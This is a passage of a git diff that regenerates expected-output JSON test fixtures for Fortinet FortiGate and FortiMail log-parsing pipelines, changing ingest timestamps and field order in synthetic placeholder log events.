@@ -2636,15 +2960,15 @@ "rule": { "description": "Dynamic address updated" }, - "message": "Updated tag FCTEMS0000011111_AV-Running.", "event": { "start": "2021-05-07T08:31:14.880+01:00", - "ingested": "2021-12-09T13:37:22.357993200Z", + "ingested": "2021-12-14T14:43:01.495920429Z", "original": "\u003c190\u003edevname=\"firewall\" devid=\"FG201EEF34CD12AB\" vd=\"root\" date=2021-05-07 time=08:31:14 eventtime=1620372674880370858 tz=\"+0100\" logid=\"0112053203\" type=\"event\" subtype=\"connector\" level=\"information\" logdesc=\"Dynamic address updated\" fctemssn=\"FCTEMS0000011111\" addr=\"FCTEMS0000011111_AV-Running\" msg=\"Updated tag FCTEMS0000011111_AV-Running.\"", "code": "0112053203", "timezone": "+0100", "kind": "event" }, + "message": "Updated tag FCTEMS0000011111_AV-Running.", "tags": [ "preserve_original_event" ] @@ -2676,15 +3000,15 @@ "rule": { "description": "Dynamic address updated" }, - "message": "Updated tag MAC_FCTEMS0000011111_AV-Running.", "event": { "start": "2021-05-07T08:31:14.880+01:00", - "ingested": "2021-12-09T13:37:22.357998900Z", + "ingested": "2021-12-14T14:43:01.495920828Z", "original": "\u003c190\u003edevname=\"firewall\" devid=\"FG201EEF34CD12AB\" vd=\"root\" date=2021-05-07 time=08:31:14 eventtime=1620372674880455433 tz=\"+0100\" logid=\"0112053203\" type=\"event\" subtype=\"connector\" level=\"information\" logdesc=\"Dynamic address updated\" fctemssn=\"FCTEMS0000011111\" addr=\"MAC_FCTEMS0000011111_AV-Running\" msg=\"Updated tag MAC_FCTEMS0000011111_AV-Running.\"", "code": "0112053203", "timezone": "+0100", "kind": "event" }, + "message": "Updated tag MAC_FCTEMS0000011111_AV-Running.", "tags": [ "preserve_original_event" ] 
@@ -2716,15 +3040,15 @@ "rule": { "description": "Dynamic address updated" }, - "message": "Updated tag FCTEMS0000011111_Connected-to-EMS.", "event": { "start": "2021-05-07T08:31:14.880+01:00", - "ingested": "2021-12-09T13:37:22.358004900Z", + "ingested": "2021-12-14T14:43:01.495921339Z", "original": "\u003c190\u003edevname=\"firewall\" devid=\"FG201EEF34CD12AB\" vd=\"root\" date=2021-05-07 time=08:31:14 eventtime=1620372674880744919 tz=\"+0100\" logid=\"0112053203\" type=\"event\" subtype=\"connector\" level=\"information\" logdesc=\"Dynamic address updated\" fctemssn=\"FCTEMS0000011111\" addr=\"FCTEMS0000011111_Connected-to-EMS\" msg=\"Updated tag FCTEMS0000011111_Connected-to-EMS.\"", "code": "0112053203", "timezone": "+0100", "kind": "event" }, + "message": "Updated tag FCTEMS0000011111_Connected-to-EMS.", "tags": [ "preserve_original_event" ] @@ -2756,15 +3080,15 @@ "rule": { "description": "Dynamic address updated" }, - "message": "Updated tag MAC_FCTEMS0000011111_Connected-to-EMS.", "event": { "start": "2021-05-07T08:31:14.880+01:00", - "ingested": "2021-12-09T13:37:22.358010500Z", + "ingested": "2021-12-14T14:43:01.495921728Z", "original": "\u003c190\u003edevname=\"firewall\" devid=\"FG201EEF34CD12AB\" vd=\"root\" date=2021-05-07 time=08:31:14 eventtime=1620372674880784143 tz=\"+0100\" logid=\"0112053203\" type=\"event\" subtype=\"connector\" level=\"information\" logdesc=\"Dynamic address updated\" fctemssn=\"FCTEMS0000011111\" addr=\"MAC_FCTEMS0000011111_Connected-to-EMS\" msg=\"Updated tag MAC_FCTEMS0000011111_Connected-to-EMS.\"", "code": "0112053203", "timezone": "+0100", "kind": "event" }, + "message": "Updated tag MAC_FCTEMS0000011111_Connected-to-EMS.", "tags": [ "preserve_original_event" ] 
@@ -2796,15 +3120,15 @@ "rule": { "description": "Dynamic address updated" }, - "message": "Updated tag FCTEMS0000011111_AV-Running.", "event": { "start": "2021-05-07T08:31:14.900+01:00", - "ingested": "2021-12-09T13:37:22.358016200Z", + "ingested": "2021-12-14T14:43:01.495922139Z", "original": "\u003c190\u003edevname=\"firewall\" devid=\"FG201EAB12CD34EF\" vd=\"root\" date=2021-05-07 time=08:31:14 eventtime=1620372674900027938 tz=\"+0100\" logid=\"0112053203\" type=\"event\" subtype=\"connector\" level=\"information\" logdesc=\"Dynamic address updated\" fctemssn=\"(null)\" addr=\"FCTEMS0000011111_AV-Running\" msg=\"Updated tag FCTEMS0000011111_AV-Running.\"", "code": "0112053203", "timezone": "+0100", "kind": "event" }, + "message": "Updated tag FCTEMS0000011111_AV-Running.", "tags": [ "preserve_original_event" ] @@ -2836,15 +3160,15 @@ "rule": { "description": "Dynamic address updated" }, - "message": "Updated tag MAC_FCTEMS0000011111_AV-Running.", "event": { "start": "2021-05-07T08:31:14.900+01:00", - "ingested": "2021-12-09T13:37:22.358023800Z", + "ingested": "2021-12-14T14:43:01.495922528Z", "original": "\u003c190\u003edevname=\"firewall\" devid=\"FG201EAB12CD34EF\" vd=\"root\" date=2021-05-07 time=08:31:14 eventtime=1620372674900167367 tz=\"+0100\" logid=\"0112053203\" type=\"event\" subtype=\"connector\" level=\"information\" logdesc=\"Dynamic address updated\" fctemssn=\"(null)\" addr=\"MAC_FCTEMS0000011111_AV-Running\" msg=\"Updated tag MAC_FCTEMS0000011111_AV-Running.\"", "code": "0112053203", "timezone": "+0100", "kind": "event" }, + "message": "Updated tag MAC_FCTEMS0000011111_AV-Running.", "tags": [ "preserve_original_event" ] 
@@ -2876,15 +3200,15 @@ "rule": { "description": "Dynamic address updated" }, - "message": "Updated tag FCTEMS0000011111_Connected-to-EMS.", "event": { "start": "2021-05-07T08:31:14.900+01:00", - "ingested": "2021-12-09T13:37:22.358027300Z", + "ingested": "2021-12-14T14:43:01.495922924Z", "original": "\u003c190\u003edevname=\"firewall\" devid=\"FG201EAB12CD34EF\" vd=\"root\" date=2021-05-07 time=08:31:14 eventtime=1620372674900749585 tz=\"+0100\" logid=\"0112053203\" type=\"event\" subtype=\"connector\" level=\"information\" logdesc=\"Dynamic address updated\" fctemssn=\"(null)\" addr=\"FCTEMS0000011111_Connected-to-EMS\" msg=\"Updated tag FCTEMS0000011111_Connected-to-EMS.\"", "code": "0112053203", "timezone": "+0100", "kind": "event" }, + "message": "Updated tag FCTEMS0000011111_Connected-to-EMS.", "tags": [ "preserve_original_event" ] @@ -2916,15 +3240,15 @@ "rule": { "description": "Dynamic address updated" }, - "message": "Updated tag MAC_FCTEMS0000011111_Connected-to-EMS.", "event": { "start": "2021-05-07T08:31:14.900+01:00", - "ingested": "2021-12-09T13:37:22.358032Z", + "ingested": "2021-12-14T14:43:01.495923314Z", "original": "\u003c190\u003edevname=\"firewall\" devid=\"FG201EAB12CD34EF\" vd=\"root\" date=2021-05-07 time=08:31:14 eventtime=1620372674900961834 tz=\"+0100\" logid=\"0112053203\" type=\"event\" subtype=\"connector\" level=\"information\" logdesc=\"Dynamic address updated\" fctemssn=\"(null)\" addr=\"MAC_FCTEMS0000011111_Connected-to-EMS\" msg=\"Updated tag MAC_FCTEMS0000011111_Connected-to-EMS.\"", "code": "0112053203", "timezone": "+0100", "kind": "event" }, + "message": "Updated tag MAC_FCTEMS0000011111_Connected-to-EMS.", "tags": [ "preserve_original_event" ] diff --git a/packages/fortinet/data_stream/fortimail/_dev/test/pipeline/test-generated.log-expected.json b/packages/fortinet/data_stream/fortimail/_dev/test/pipeline/test-generated.log-expected.json index db1073d9162..43c00645324 100644 
--- a/packages/fortinet/data_stream/fortimail/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/fortinet/data_stream/fortimail/_dev/test/pipeline/test-generated.log-expected.json 
@@ -1,1200 +1,1200 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-1-29 time=06:09:59 device_id=pexe log_id=nes log_part=eab type=event subtype=update pri=high msg=\"boNemoe\"", "event": { - "ingested": "2021-12-09T13:37:30.095994800Z" + "ingested": "2021-12-14T14:43:09.749021788Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-2-12 time=13:12:33 device_id=ehend log_id=ritquiin log_part=umqui type=virus subtype=infected pri=very-high from=\"mest\" to=enderitq client_name=\"sperna884.internal.domain\" client_ip=\"10.165.201.71\" session_id=\"pisciv\" msg=\"uii\"", "event": { - "ingested": "2021-12-09T13:37:30.096004200Z" + "ingested": "2021-12-14T14:43:09.749024414Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-2-26 time=20:15:08 device_id=doeiu log_id=nia log_part=olupt type=event subtype=config pri=low user=quipexe ui=alo(10.212.18.145) module=umdo submodule=itessequ msg=vol", "event": { - "ingested": "2021-12-09T13:37:30.096010600Z" + "ingested": "2021-12-14T14:43:09.749024885Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-3-12 time=03:17:42 device_id=uipexea log_id=tatio log_part=minim type=event subtype=pop3 pri=high user=ceroinBC ui=ratvolup action=deny status=iatu msg=\"ionofde\"", "event": { - "ingested": "2021-12-09T13:37:30.096016700Z" + "ingested": "2021-12-14T14:43:09.749025309Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-3-26 time=10:20:16 device_id=itati log_id=mfu log_part=uid type=event subtype=pop3 pri=very-high user=obeataev ui=lor action=block status=autfu msg=\"natura\"", "event": { - "ingested": 
"2021-12-09T13:37:30.096022700Z" + "ingested": "2021-12-14T14:43:09.749025720Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-4-9 time=17:22:51 device_id=llamcorp log_id=ari log_part=eataevit type=event subtype=system pri=high user=iam ui=mqua action=allow status=olab msg=mquisnos", "event": { - "ingested": "2021-12-09T13:37:30.096028800Z" + "ingested": "2021-12-14T14:43:09.749026123Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-4-24 time=00:25:25 device_id=enimad log_id=incididu log_part=eci type=virus pri=very-high from=tenbyCic to=boree src=10.98.69.43 session_id=\"iinea\" msg=ipit", "event": { - "ingested": "2021-12-09T13:37:30.096034900Z" + "ingested": "2021-12-14T14:43:09.749026502Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-5-8 time=07:27:59 device_id=taliqu log_id=temUten log_part=ccusan type=virus subtype=infected pri=low from=\"Ciceroi\" to=\"aveniam\" client_name=\"uradi7307.internal.corp\" client_ip=\"10.118.96.139\" session_id=\"sitas\" msg=ehenderi", "event": { - "ingested": "2021-12-09T13:37:30.096041Z" + "ingested": "2021-12-14T14:43:09.749026884Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-5-22 time=14:30:33 device_id=smo log_id=litessec log_part=emporinc type=event subtype=pop3 pri=very-high user=ipsumq ui=atcu action=allow status=tessec msg=\"remipsum\"", "event": { - "ingested": "2021-12-09T13:37:30.096047Z" + "ingested": "2021-12-14T14:43:09.749027280Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-6-5 time=21:33:08 device_id=ntutl log_id=caecatc 
log_part=onsequat type=event subtype=update pri=low msg=\"edquiano\"", "event": { - "ingested": "2021-12-09T13:37:30.096053Z" + "ingested": "2021-12-14T14:43:09.749027661Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-6-20 time=04:35:42 device_id=idestla log_id=Nemoeni log_part=uradi type=statistics pri=very-high session_id=\"lup\" from=\"remeumf\" mailer=antiumto client_name=\"10.241.165.37\" MSISDN=aUteni resolved=ittenbyC to=\"aperi\" direction=\"inbound\" message_length=ita virus=\"ipi\" disposition=rsitamet classifier=\"lupt\" subject=\"xea\"", "event": { - "ingested": "2021-12-09T13:37:30.096059100Z" + "ingested": "2021-12-14T14:43:09.749028055Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-7-4 time=11:38:16 device_id=amvolup log_id=sequi log_part=rehend type=event subtype=webmail pri=high user=eme ui=numqu(10.232.149.140) action=allow status=lum msg=utali", "event": { - "ingested": "2021-12-09T13:37:30.096067700Z" + "ingested": "2021-12-14T14:43:09.749028659Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-7-18 time=18:40:50 device_id=estiae log_id=sci log_part=oei type=virus_file-signature pri=low snostrud to=nama src=\"10.24.67.250\" session_id=\"dolor\" msg=\"nnum\"", "event": { - "ingested": "2021-12-09T13:37:30.096074Z" + "ingested": "2021-12-14T14:43:09.749029074Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-8-2 time=01:43:25 device_id=oluptas log_id=tNequepo log_part=lup type=event subtype=update pri=medium msg=equat", "event": { - "ingested": "2021-12-09T13:37:30.096080Z" + "ingested": "2021-12-14T14:43:09.749029468Z" + }, + "ecs": { + "version": "1.12.0" }, 
"tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-8-16 time=08:45:59 device_id=abi log_id=sectetur log_part=uioffi type=event subtype=update pri=high msg=veniamq", "event": { - "ingested": "2021-12-09T13:37:30.096086100Z" + "ingested": "2021-12-14T14:43:09.749029855Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-8-30 time=15:48:33 device_id=orem log_id=beata log_part=hitecto type=statistics pri=very-high session_id=\"texp\" client_name=\"[10.179.124.125]\"dst_ip=\"10.177.36.38\" from=\"sequine\" to=\"ectio\" polid=\"dutper\" domain=\"lamcolab3252.www.invalid\" subject=\"gel\" mailer=\"lorsitam\" resolved=\"mpo\" direction=\"inbound\" virus=\"ris\" disposition=\"uamqu\" classifier=\"lor\" message_length=oide", "event": { - "ingested": "2021-12-09T13:37:30.096092300Z" + "ingested": "2021-12-14T14:43:09.749030259Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-9-13 time=22:51:07 device_id=didunt log_id=uptatema log_part=intocc type=virus subtype=file-signature pri=very-high from=\"orema\" to=invento src=[10.164.39.248] session_id=\"nofdeFin\" msg=sequam", "event": { - "ingested": "2021-12-09T13:37:30.096096900Z" + "ingested": "2021-12-14T14:43:09.749030757Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-9-28 time=05:53:42 device_id=tvolu log_id=ecte log_part=tinvolu type=virus_file-signature pri=high from=\"ntiumdo\" to=\"autfu\" src=gnaaliq [10.52.135.156] session_id=\"litse\" msg=\"icabo\"", "event": { - "ingested": "2021-12-09T13:37:30.096101900Z" + "ingested": "2021-12-14T14:43:09.749031156Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": 
"date=2016-10-12 time=12:56:16 device_id=stru log_id=tectobe log_part=Nequepo type=event subtype=config pri=very-high user=pora ui=boree module=evolup submodule=ionofdeF msg=\"evelit\"", "event": { - "ingested": "2021-12-09T13:37:30.096107700Z" + "ingested": "2021-12-14T14:43:09.749031544Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-10-26 time=19:58:50 device_id=uatD log_id=ariatu log_part=edquiac type=event subtype=smtp pri=high user=atno ui=tani action=allow status=ntocca session_id=ostru log_part=ntoccae msg=autf", "event": { - "ingested": "2021-12-09T13:37:30.096113Z" + "ingested": "2021-12-14T14:43:09.749031925Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-11-10 time=03:01:24 device_id=tenimad log_id=minimav log_part=udexerci type=spam pri=very-high session_id=\"itam\" client_name=\"str976.internal.localhost [10.166.225.26]\" from=tanimid to=umdo subject=\"natuse\" msg=\"gnamal\"", "event": { - "ingested": "2021-12-09T13:37:30.096117400Z" + "ingested": "2021-12-14T14:43:09.749032302Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-11-24 time=10:03:59 device_id=intoc log_id=rQuisau log_part=itess type=virus subtype=infected pri=high from=evit to=\"runtm\" client_name=\"molli4306.www5.home\" client_ip=\"10.218.243.47\" session_id=\"borios\" msg=rsitvolu", "event": { - "ingested": "2021-12-09T13:37:30.096122400Z" + "ingested": "2021-12-14T14:43:09.749032688Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-12-8 time=17:06:33 device_id=quamqua log_id=eacommod log_part=ctetura type=event subtype=imap pri=high user=tpersp ui=stla action=allow status=sequamni msg=uradi", "event": 
{ - "ingested": "2021-12-09T13:37:30.096128600Z" + "ingested": "2021-12-14T14:43:09.749033063Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-12-23 time=00:09:07 device_id=dolore log_id=onsecte log_part=nBCSedut type=virus subtype=file-signature pri=high from=\"modocons\" to=gitsed src=\"10.16.177.212\" session_id=\"emp\" msg=\"Attachment file (pisciv) has sha1 hash value: lumdolor\"", "event": { - "ingested": "2021-12-09T13:37:30.096133200Z" + "ingested": "2021-12-14T14:43:09.749033557Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-1-6 time=07:11:41 device_id=uaUten log_id=nby log_part=mve type=event subtype=config pri=low user=isau ui=rautodi(10.96.97.81) module=pis submodule=nsequat msg=doloreme", "event": { - "ingested": "2021-12-09T13:37:30.096137900Z" + "ingested": "2021-12-14T14:43:09.749033936Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-1-20 time=14:14:16 device_id=aec log_id=fdeF log_part=iquidexe type=spam pri=low session_id=\"niamq\" client_name= \"lapariat7287.internal.host\" client_ip=\"10.140.7.83\" dst_ip=\"10.68.246.187\" from=\"icabo\" to=\"gna\" subject=\"con\" msg=\"preh\"", "event": { - "ingested": "2021-12-09T13:37:30.096141700Z" + "ingested": "2021-12-14T14:43:09.749034335Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-2-3 time=21:16:50 device_id=amcor log_id=ica log_part=lillum type=event subtype=admin pri=very-high user=dicta ui=taedicta action=accept status=poriss reason=failure msg=equaturv", "event": { - "ingested": "2021-12-09T13:37:30.096146500Z" + "ingested": "2021-12-14T14:43:09.749034740Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ 
"preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-2-18 time=04:19:24 device_id=tpersp log_id=llamc log_part=nte type=event subtype=pop3 pri=very-high user=utali ui=porinc(10.48.204.44) action=accept status=dat msg=aincidu", "event": { - "ingested": "2021-12-09T13:37:30.096152900Z" + "ingested": "2021-12-14T14:43:09.749035125Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-3-4 time=11:21:59 device_id=dipisci log_id=spernatu log_part=admi type=event subtype=pop3 pri=very-high user=quunt ui=olori action=allow status=autodit msg=elit", "event": { - "ingested": "2021-12-09T13:37:30.096159100Z" + "ingested": "2021-12-14T14:43:09.749035519Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-3-18 time=18:24:33 device_id=nte log_id=ulpa log_part=sitam type=virus subtype=file-signature pri=low enderit to=sequa src=\"[10.111.233.194]\" session_id=eirure msg=deserun", "event": { - "ingested": "2021-12-09T13:37:30.096165200Z" + "ingested": "2021-12-14T14:43:09.749035909Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-4-2 time=01:27:07 device_id=ptateve log_id=enderi log_part=ptatem type=event subtype=smtp pri=very-high user=fugi ui=labo action=block status=ullamcor session_id=itationu msg=proident", "event": { - "ingested": "2021-12-09T13:37:30.096171200Z" + "ingested": "2021-12-14T14:43:09.749036301Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-4-16 time=08:29:41 device_id=atione log_id=lores log_part=ritati type=statistics pri=very-high session_id=uii client_name=estl5804.internal.local client_ip=10.73.207.70 dst_ip=10.179.210.218 from=taut 
hfrom=tanimi to=rumSecti polid=iuntNe domain=atise3421.www5.localdomain mailer=oluptas resolved=emvele src_type=isnost direction=inbound virus=Sedut disposition=yCiceroi classifier=quunt message_length=acommod subject=sitvol", "event": { - "ingested": "2021-12-09T13:37:30.096177200Z" + "ingested": "2021-12-14T14:43:09.749036686Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-4-30 time=15:32:16 device_id=liquide log_id=odt log_part=Sedutpe type=event subtype=admin pri=medium user=rroq ui=rcit(10.43.62.246) action=accept status=estl reason=success msg=citatio", "event": { - "ingested": "2021-12-09T13:37:30.096183300Z" + "ingested": "2021-12-14T14:43:09.749037085Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-5-14 time=22:34:50 device_id=taedict log_id=edquian log_part=loremeu type=event subtype=admin pri=very-high user=volupta ui=dmi action=allow status=aaliq reason=unknown msg=lupta", "event": { - "ingested": "2021-12-09T13:37:30.096189400Z" + "ingested": "2021-12-14T14:43:09.749037477Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-5-29 time=05:37:24 device_id=occ log_id=oloreseo log_part=iruredol type=virus subtype=file-signature pri=very-high derit to=orese src=\"[10.28.105.124]\" session_id=\"strude\" msg=eritin", "event": { - "ingested": "2021-12-09T13:37:30.096195600Z" + "ingested": "2021-12-14T14:43:09.749037986Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-6-12 time=12:39:58 device_id=temUten log_id=dutper log_part=sitamet type=event subtype=admin pri=very-high user=illumqui ui=saq action=block status=ritqu reason=unknown msg=\"idolor\"", "event": { - "ingested": 
"2021-12-09T13:37:30.096201700Z" + "ingested": "2021-12-14T14:43:09.749038378Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-6-26 time=19:42:33 device_id=quide log_id=quaU log_part=undeomni type=virus_file-signature pri=medium acomm to=iutali src=\"[10.219.13.150]\" session_id=Finibus msg=radi", "event": { - "ingested": "2021-12-09T13:37:30.096207700Z" + "ingested": "2021-12-14T14:43:09.749038789Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-7-11 time=02:45:07 device_id=inrepr log_id=mol log_part=umdolors type=event subtype=pop3 pri=medium user=imad ui=oriosam(10.163.114.215) action=deny status=sitametc msg=onsequa", "event": { - "ingested": "2021-12-09T13:37:30.096213900Z" + "ingested": "2021-12-14T14:43:09.749039175Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-7-25 time=09:47:41 device_id=riosa log_id=tNe log_part=pisc type=event subtype=webmail pri=very-high user=caecat ui=rautod(10.124.32.120) action=accept status=atcupi msg=atem", "event": { - "ingested": "2021-12-09T13:37:30.096220100Z" + "ingested": "2021-12-14T14:43:09.749039559Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-8-8 time=16:50:15 device_id=undeom log_id=emullamc log_part=tec type=event subtype=imap pri=medium user=eetdo ui=tlab action=cancel status=liq msg=seddoeiu", "event": { - "ingested": "2021-12-09T13:37:30.096226200Z" + "ingested": "2021-12-14T14:43:09.749039945Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-8-22 time=23:52:50 device_id=edictasu log_id=mdolors log_part=oremi type=event subtype=imap 
pri=medium user=atis ui=atDuis action=accept status=nisiut msg=\"rumwri\"", "event": { - "ingested": "2021-12-09T13:37:30.096232300Z" + "ingested": "2021-12-14T14:43:09.749040339Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-9-6 time=06:55:24 device_id=lumqu log_id=onulamco log_part=ons type=event subtype=pop3 pri=low user=uptat ui=unt action=accept status=uido msg=tla", "event": { - "ingested": "2021-12-09T13:37:30.096238400Z" + "ingested": "2021-12-14T14:43:09.749040723Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-9-20 time=13:57:58 device_id=uamqu log_id=olori log_part=ido type=spam pri=low session_id=\"sunt\" from=\"autfugit\" to=\"emUte\" msg=iusmodi", "event": { - "ingested": "2021-12-09T13:37:30.096242900Z" + "ingested": "2021-12-14T14:43:09.749041107Z" }, - "tags": [ + "ecs": { + "version": "1.12.0" + }, + "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-10-4 time=21:00:32 device_id=umS log_id=iciadese log_part=riatur type=event subtype=webmail pri=very-high user=xeacommo ui=Cicero(10.247.53.179) action=cancel status=ditau msg=atemaccu", "event": { - "ingested": "2021-12-09T13:37:30.096247900Z" + "ingested": "2021-12-14T14:43:09.749041482Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-10-19 time=04:03:07 device_id=urau log_id=etur log_part=rsitvol type=event subtype=config pri=low user=laborum ui=ostr(10.70.91.185) module=lumdo submodule=acom msg=\"eFini\"", "event": { - "ingested": "2021-12-09T13:37:30.096253500Z" + "ingested": "2021-12-14T14:43:09.749041873Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-11-2 
time=11:05:41 device_id=upta log_id=itessequ log_part=iusmodit type=event subtype=update pri=very-high msg=exerci", "event": { - "ingested": "2021-12-09T13:37:30.096258800Z" + "ingested": "2021-12-14T14:43:09.749042262Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-11-16 time=18:08:15 device_id=mmodoco log_id=amni log_part=atnul type=event subtype=webmail pri=medium user=iquidexe ui=illumq(10.215.65.52) action=accept status=tasnul msg=\"tuserr\"", "event": { - "ingested": "2021-12-09T13:37:30.096263Z" + "ingested": "2021-12-14T14:43:09.749042664Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-12-1 time=01:10:49 device_id=porinc log_id=riame log_part=riat type=event subtype=admin pri=medium user=rumSec ui=orp action=deny status=udan reason=unknown msg=\"essequam\"", "event": { - "ingested": "2021-12-09T13:37:30.096268100Z" + "ingested": "2021-12-14T14:43:09.749043049Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-12-15 time=08:13:24 device_id=itse log_id=ilm log_part=mvel type=virus subtype=infected pri=high from=seos to=exercita client_name=\"edolori3822.api.home\" client_ip=\"10.63.177.46\" session_id=\"oluptate\" msg=lit", "event": { - "ingested": "2021-12-09T13:37:30.096274400Z" + "ingested": "2021-12-14T14:43:09.749043431Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-12-29 time=15:15:58 device_id=iciade log_id=uis log_part=amc type=event subtype=webmail pri=medium user=Ute ui=ptassita action=allow status=runtm msg=\"eturadip\"", "event": { - "ingested": "2021-12-09T13:37:30.096279Z" + "ingested": "2021-12-14T14:43:09.749043811Z" + }, + "ecs": { + "version": "1.12.0" }, 
